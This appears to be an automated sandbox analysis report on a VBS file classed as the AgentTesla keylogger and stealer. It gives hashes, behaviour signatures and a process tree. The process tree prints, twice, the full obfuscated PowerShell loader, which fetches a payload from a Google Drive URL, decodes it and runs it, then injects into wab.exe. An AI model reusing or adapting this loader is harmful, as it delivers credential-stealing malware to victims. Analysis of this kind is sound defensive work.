Overview

overview

10

Static

static

1

137dba4596...60.vbs

windows7-x64

10

137dba4596...60.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-05-2024 18:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    137dba4596af3536acacb3ce1190517061eecc9703c1e3533b35319b99fcdc60.vbs

  • Size

    424KB

  • MD5

    daa48dda60b2f2d7095a7190a75bdda8

  • SHA1

    b99a7214799a5f1680e49f5a2f80faf13537c013

  • SHA256

    137dba4596af3536acacb3ce1190517061eecc9703c1e3533b35319b99fcdc60

  • SHA512

    dad8a466a3dd01c5231c736399110cfdc0a02090368d66a8fcb6a527add1c1a1a9c0307823b5424ac4ebe11f9a0a0b3f029e6f7cfd4699945d5d776d4d2f8053

  • SSDEEP

    6144:z74t1fXGwzkAitPzmeI9OQYypkHkSVdtxQ+5iYgbAL0WMhw19+z0yhtHn9eq/+4X:zAJv0ayfOb64MRycngoavbN0vBrbjkLt

Score
10/10
agentteslakeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\137dba4596af3536acacb3ce1190517061eecc9703c1e3533b35319b99fcdc60.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4784
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Critic = 1;$Saddelmagerarbejder='Su';$Saddelmagerarbejder+='bstrin';$Saddelmagerarbejder+='g';Function Overindulgently($blyanttegningen){$Tangier=$blyanttegningen.Length-$Critic;For($Harmoniseringsndringer=1;$Harmoniseringsndringer -lt $Tangier;$Harmoniseringsndringer+=2){$Teletjenesterne+=$blyanttegningen.$Saddelmagerarbejder.Invoke( $Harmoniseringsndringer, $Critic);}$Teletjenesterne;}function Tights($Pseudoofficial){. ($Arkivdannelse) ($Pseudoofficial);}$Rutebaaden=Overindulgently 'HM o.zEi lIl,a,/U5 .E0, .( W iDnGdBo wDs. ,NGTH G1B0L..0 ;B MWCi nL6 4B;S x.6T4.;K RrRv :,1,2A1F..0T)K AG eHcSkHoE/K2S0 1 0 0R1 0M1S MF iOr e f.oTxV/L1 2R1 . 0N ';$Skgpantebreves=Overindulgently 'SUSs eFrR- A,g.eLn,tK ';$idiologism=Overindulgently ' hRt tRpIsi:C/ /Td rWiOvPeP.Sg oToIgElSes.Zc oTmS/AuOcC?Geax pFo r tO=,d oJw.nUlHoTaSd,& i,d =V1e7ClNm r h.WT8.cKG l 7Sv,n x NUrTF J W a r 8.y,V.WBjBtE_.M B.H,C ';$Syndfloderne=Overindulgently ',> ';$Arkivdannelse=Overindulgently 'Sipe xJ ';$Frtidspensionisten='Phosphorical';Tights (Overindulgently 'SS eRt.- CTo.n.tTe nRtE - PSaRt hG TU:M\SU n,p a t eSr.n a,l,. tSx tA - VDa lSuSeK S$BFVr t i,d,sFpTeEnisBi,oSnFiRs.t e nG;S ');Tights (Overindulgently ',i.f ( t eFsStF-MpUaHt h TP: \BUUnNpWaMtue rLnBa l . t,xWt.) {SetxsiHt.}.; ');$Bookmark = Overindulgently 'SeBcMh,o ,% aTpFpRdAaOtOau%T\Bt i dMs b eHsLt eHm t,.SS m,aS B&T& .e cMh oF $S ';Tights (Overindulgently ' $ gSl.oGb aGl.: L.nTgFs e,l.s.fGuPlNd ess =.( c,mKdD C/Rc N$RB.o.oVkUmGaIrNkD) ');Tights (Overindulgently ' $.gil o b arl : S k,e,l,l.eBtK=g$Gi dsiSo lCo g.i sUmd..s.p,lDiLtS(E$ SFy nKd f.l oRdTeCr,nOeM)K ');$idiologism=$Skellet[0];Tights (Overindulgently 'l$ g l.o bAaAlS:RONv eJr cVo nUfMiSd ernSc.eIs,1 6.7U=BN e wk-MOLbAj eOcVtE DS y sNtPeDmS.FN eutD.FW,e bSC l,i,e n,tP ');Tights (Overindulgently 'S$,OGvBe r c.o nEfPi dHeSnPcTeNsC1I6T7G..H e aHdSe,r,sU[ $ASFk gUp,amnSt,eSb,rDe vOe sO]U=,$YRKu t.eUb aOadd.eHn ');$Tolvfingertarmene=Overindulgently ',OAv elrsc o nSf.iAd eGn c eBs,1T6P7 . DAoFwSn,lPoRa d FTiflAe ( $ iSd i oAlEo gTiHsNm,, $mB e gLgPakr w eGeBdS)D ';$Tolvfingertarmene=$Lngselsfuldes[1]+$Tolvfingertarmene;$Beggarweed=$Lngselsfuldes[0];Tights (Overindulgently '.$FgTlRo,b aElM:UR.e,vSaVlLi,dMe rGe ngd eO=I(sTnePs t,-.P aLtVh, ,$jBLe.gAgAaFr wCe eBd )C ');while (!$Revaliderende) {Tights (Overindulgently 'S$Rg l o,b aEl,:FS.iUp,pFe nUi,p =K$St r,uUe ') ;Tights $Tolvfingertarmene;Tights (Overindulgently 'OS,t.aKr t -USGl e eEp, .4F ');Tights (Overindulgently 'E$Og,lUoDb,aTlV: RHeSv.a.lHiRd e rKe nDd eS=.(STAeLs tF- PRa.tFhG $DB e.gCg aUr whe efd,)U ') ;Tights (Overindulgently 'P$Pg,l o bFa lP:MA dSr e a m.= $ g.lvo bBaBl.:KG.aurSd e rGo,bOe rDn.eAs.+ +S%.$.SSk e,lcl eVtN.fc.oSu nCtS ') ;$idiologism=$Skellet[$Adream];}$Thaisilkens=345059;$Grundlovsforhr=26762;Tights (Overindulgently ' $ gDl oHb a.lR:,BBe n a rTb elj.dge r.s F=A G e,tA-.CDoKn,t,e nUtM P$ Bie,g g a r wAe e dL ');Tights (Overindulgently 'B$Eg l oRbSa,l,:Pv.uSltg,a rFi z e O=. [ SAyEs t,eSm,.SCRo.nGvTeBr.tU]P:A: F rPo mVB aTsVe 6.4ASMtDr i n.gA(.$NB e nUaIrSb,eFjcd ecr.s ) ');Tights (Overindulgently 'D$ g,l,o bVa lB:EFIo rVm e r n,eMsK .=A T[ S y sPt emmO.OTBe xKtC. E n.cEoBdDiBn gU].:R:SAAS CiI I,.DG estHSRtDrTiPnEgF( $Pv uBl g aSr iSz e ) ');Tights (Overindulgently 'A$Pg.l.o bGaRlB:LI n,tMr uPd r,eSsRs =U$TF,oBr m,eSrAn,eBsS.,s u b.sJtDr i,nBg (.$UT,hCaHiEs i l k e.n.s ,S$ GUrSu.n.dSl,o v.sTfKo.rRhNr ). ');Tights $Intrudress;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:640
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\tidsbestemt.Sma && echo $"
        3⤵
          PID:2240
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Critic = 1;$Saddelmagerarbejder='Su';$Saddelmagerarbejder+='bstrin';$Saddelmagerarbejder+='g';Function Overindulgently($blyanttegningen){$Tangier=$blyanttegningen.Length-$Critic;For($Harmoniseringsndringer=1;$Harmoniseringsndringer -lt $Tangier;$Harmoniseringsndringer+=2){$Teletjenesterne+=$blyanttegningen.$Saddelmagerarbejder.Invoke( $Harmoniseringsndringer, $Critic);}$Teletjenesterne;}function Tights($Pseudoofficial){. ($Arkivdannelse) ($Pseudoofficial);}$Rutebaaden=Overindulgently 'HM o.zEi lIl,a,/U5 .E0, .( W iDnGdBo wDs. ,NGTH G1B0L..0 ;B MWCi nL6 4B;S x.6T4.;K RrRv :,1,2A1F..0T)K AG eHcSkHoE/K2S0 1 0 0R1 0M1S MF iOr e f.oTxV/L1 2R1 . 0N ';$Skgpantebreves=Overindulgently 'SUSs eFrR- A,g.eLn,tK ';$idiologism=Overindulgently ' hRt tRpIsi:C/ /Td rWiOvPeP.Sg oToIgElSes.Zc oTmS/AuOcC?Geax pFo r tO=,d oJw.nUlHoTaSd,& i,d =V1e7ClNm r h.WT8.cKG l 7Sv,n x NUrTF J W a r 8.y,V.WBjBtE_.M B.H,C ';$Syndfloderne=Overindulgently ',> ';$Arkivdannelse=Overindulgently 'Sipe xJ ';$Frtidspensionisten='Phosphorical';Tights (Overindulgently 'SS eRt.- CTo.n.tTe nRtE - PSaRt hG TU:M\SU n,p a t eSr.n a,l,. tSx tA - VDa lSuSeK S$BFVr t i,d,sFpTeEnisBi,oSnFiRs.t e nG;S ');Tights (Overindulgently ',i.f ( t eFsStF-MpUaHt h TP: \BUUnNpWaMtue rLnBa l . t,xWt.) {SetxsiHt.}.; ');$Bookmark = Overindulgently 'SeBcMh,o ,% aTpFpRdAaOtOau%T\Bt i dMs b eHsLt eHm t,.SS m,aS B&T& .e cMh oF $S ';Tights (Overindulgently ' $ gSl.oGb aGl.: L.nTgFs e,l.s.fGuPlNd ess =.( c,mKdD C/Rc N$RB.o.oVkUmGaIrNkD) ');Tights (Overindulgently ' $.gil o b arl : S k,e,l,l.eBtK=g$Gi dsiSo lCo g.i sUmd..s.p,lDiLtS(E$ SFy nKd f.l oRdTeCr,nOeM)K ');$idiologism=$Skellet[0];Tights (Overindulgently 'l$ g l.o bAaAlS:RONv eJr cVo nUfMiSd ernSc.eIs,1 6.7U=BN e wk-MOLbAj eOcVtE DS y sNtPeDmS.FN eutD.FW,e bSC l,i,e n,tP ');Tights (Overindulgently 'S$,OGvBe r c.o nEfPi dHeSnPcTeNsC1I6T7G..H e aHdSe,r,sU[ $ASFk gUp,amnSt,eSb,rDe vOe sO]U=,$YRKu t.eUb aOadd.eHn ');$Tolvfingertarmene=Overindulgently ',OAv elrsc o nSf.iAd eGn c eBs,1T6P7 . DAoFwSn,lPoRa d FTiflAe ( $ iSd i oAlEo gTiHsNm,, $mB e gLgPakr w eGeBdS)D ';$Tolvfingertarmene=$Lngselsfuldes[1]+$Tolvfingertarmene;$Beggarweed=$Lngselsfuldes[0];Tights (Overindulgently '.$FgTlRo,b aElM:UR.e,vSaVlLi,dMe rGe ngd eO=I(sTnePs t,-.P aLtVh, ,$jBLe.gAgAaFr wCe eBd )C ');while (!$Revaliderende) {Tights (Overindulgently 'S$Rg l o,b aEl,:FS.iUp,pFe nUi,p =K$St r,uUe ') ;Tights $Tolvfingertarmene;Tights (Overindulgently 'OS,t.aKr t -USGl e eEp, .4F ');Tights (Overindulgently 'E$Og,lUoDb,aTlV: RHeSv.a.lHiRd e rKe nDd eS=.(STAeLs tF- PRa.tFhG $DB e.gCg aUr whe efd,)U ') ;Tights (Overindulgently 'P$Pg,l o bFa lP:MA dSr e a m.= $ g.lvo bBaBl.:KG.aurSd e rGo,bOe rDn.eAs.+ +S%.$.SSk e,lcl eVtN.fc.oSu nCtS ') ;$idiologism=$Skellet[$Adream];}$Thaisilkens=345059;$Grundlovsforhr=26762;Tights (Overindulgently ' $ gDl oHb a.lR:,BBe n a rTb elj.dge r.s F=A G e,tA-.CDoKn,t,e nUtM P$ Bie,g g a r wAe e dL ');Tights (Overindulgently 'B$Eg l oRbSa,l,:Pv.uSltg,a rFi z e O=. [ SAyEs t,eSm,.SCRo.nGvTeBr.tU]P:A: F rPo mVB aTsVe 6.4ASMtDr i n.gA(.$NB e nUaIrSb,eFjcd ecr.s ) ');Tights (Overindulgently 'D$ g,l,o bVa lB:EFIo rVm e r n,eMsK .=A T[ S y sPt emmO.OTBe xKtC. E n.cEoBdDiBn gU].:R:SAAS CiI I,.DG estHSRtDrTiPnEgF( $Pv uBl g aSr iSz e ) ');Tights (Overindulgently 'A$Pg.l.o bGaRlB:LI n,tMr uPd r,eSsRs =U$TF,oBr m,eSrAn,eBsS.,s u b.sJtDr i,nBg (.$UT,hCaHiEs i l k e.n.s ,S$ GUrSu.n.dSl,o v.sTfKo.rRhNr ). ');Tights $Intrudress;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1268
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\tidsbestemt.Sma && echo $"
            4⤵
              PID:464
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2076

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iyuuqhat.mnp.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Roaming\tidsbestemt.Sma
        Filesize

        484KB

        MD5

        37b5e04829f22394ecd93d96a6abb364

        SHA1

        1100d43b7f38319d657ccfdaa1c23b2fa9b8f787

        SHA256

        d81b1ebdbeacbeeb7ea1b5398ff1f2b2ff76a2386d23850f1c5ad0758475a2ac

        SHA512

        3c462bfc901eb7d66eb7875503b604b2b646857cac49a23713a066b8f8a5accadff453772b76285b769b01b6de7ec859338e416489dff38434cc17cdcb8a1915

        Download Submit

      • memory/640-1-0x0000024CDEB90000-0x0000024CDEBB2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/640-11-0x00007FF85ABF0000-0x00007FF85B6B1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/640-12-0x00007FF85ABF0000-0x00007FF85B6B1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/640-13-0x00007FF85ABF0000-0x00007FF85B6B1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/640-59-0x00007FF85ABF0000-0x00007FF85B6B1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/640-0-0x00007FF85ABF3000-0x00007FF85ABF5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/640-41-0x00007FF85ABF3000-0x00007FF85ABF5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/640-40-0x00007FF85ABF0000-0x00007FF85B6B1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1268-17-0x0000000004F40000-0x0000000005568000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/1268-20-0x0000000005840000-0x00000000058A6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/1268-31-0x0000000005E60000-0x0000000005E7E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/1268-32-0x0000000005EA0000-0x0000000005EEC000-memory.dmp

        Filesize

        304KB

        Download

      • memory/1268-33-0x00000000076D0000-0x0000000007D4A000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/1268-34-0x0000000006400000-0x000000000641A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/1268-35-0x0000000007110000-0x00000000071A6000-memory.dmp

        Filesize

        600KB

        Download

      • memory/1268-36-0x0000000006470000-0x0000000006492000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1268-37-0x0000000008300000-0x00000000088A4000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/1268-30-0x00000000059B0000-0x0000000005D04000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/1268-39-0x00000000088B0000-0x000000000A5F5000-memory.dmp

        Filesize

        29.3MB

        Download

      • memory/1268-19-0x00000000056A0000-0x0000000005706000-memory.dmp

        Filesize

        408KB

        Download

      • memory/1268-18-0x0000000005600000-0x0000000005622000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1268-16-0x00000000048D0000-0x0000000004906000-memory.dmp

        Filesize

        216KB

        Download

      • memory/2076-56-0x0000000000C70000-0x0000000000CB2000-memory.dmp

        Filesize

        264KB

        Download

      • memory/2076-55-0x0000000000C70000-0x0000000001EC4000-memory.dmp

        Filesize

        18.3MB

        Download

      • memory/2076-61-0x0000000022170000-0x00000000221C0000-memory.dmp

        Filesize

        320KB

        Download

      • memory/2076-62-0x0000000022870000-0x0000000022902000-memory.dmp

        Filesize

        584KB

        Download

      • memory/2076-63-0x00000000221C0000-0x00000000221CA000-memory.dmp

        Filesize

        40KB

        Download